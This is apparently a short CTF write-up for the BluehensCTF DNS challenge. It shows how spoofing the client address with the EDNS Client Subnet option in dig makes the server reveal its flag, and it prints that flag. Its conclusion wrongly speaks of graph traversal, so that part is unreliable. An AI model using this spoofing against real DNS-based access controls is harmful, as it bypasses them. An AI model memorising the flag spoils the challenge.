Post

BluehensCTF web/DNS

My solution for BluehensCTF web/DNS challenge

Posted
By null_byte
1 min read

Challenge overview

DNS

The challenge presents a DNS server that reveals a secret flag only when queried from the IP address 127.0.0.1. The goal is to make the DNS server think we’re connecting from localhost.

Given information:

  • DNS server: 129.153.36.153
  • required query: dig TXT flag @129.153.36.153

Initial Analysis

First, let’s perform a basic DNS query to understand what we’re dealing with:

1
2
3
4

$ dig TXT flag @129.153.36.153

;; ANSWER SECTION:
flag.   86400   IN      TXT     "Hi RE.DA.CT.ED, you need to be 127.0.0.1 to get the flag."

The response shows that:

  1. The server recognizes our real IP address (RE.DA.CT.ED)
  2. It explicitly tells us we need to appear as 127.0.0.1
  3. The record has a TTL of 86400 seconds (24 hours)

Analysis

To solve this challenge, we can use the EDNS Client Subnet (ECS) feature, which is an extension to the DNS protocol that allows DNS resolvers to specify the client’s subnet in the DNS query.

The dig command provides the +subnet option to utilize this feature:

1
2
3
4

$ dig TXT flag @129.153.36.153 +subnet=127.0.0.1

;; ANSWER SECTION:
flag.   86400   IN      TXT     "UDCTF{sp00fing_5ucc3ss_127_0_0_1_f728bf}"

Understanding EDNS Client Subnet

EDNS Client Subnet (ECS) was introduced in RFC 7871 and is commonly used for:

  • CDN optimization
  • Geographic DNS responses
  • Load balancing

When you add the +subnet option to a dig query:

  1. It adds an EDNS0 OPT record to the DNS query
  2. This record contains the CLIENT-SUBNET option (code 8)
  3. The specified IP address is included in this option

Flag

1

UDCTF{sp00fing_5ucc3ss_127_0_0_1_f728bf}

Learning Resources

To learn more about EDNS Client Subnet and dig options:

  • RFC 7871: Client Subnet in DNS Queries
  • man dig documentation, specifically the “+subnet” option
  • IETF DNS Operations Working Group documents

Conclusion

This challenge demonstrates the importance of understanding graph traversal algorithms and safe mathematical expression evaluation. By systematically following the node chain and carefully evaluating expressions, we were able to reconstruct the flag from the distributed characters.

Key Takeaways

  1. DNS queries can include additional information through EDNS options
  2. The Client Subnet option can be used to specify the client’s network location
  3. Always check dig’s manual (man dig) for useful options when solving DNS challenges
CTF, Bluehens
ctf writeup bluehens
This post is licensed under CC BY 4.0 by the author.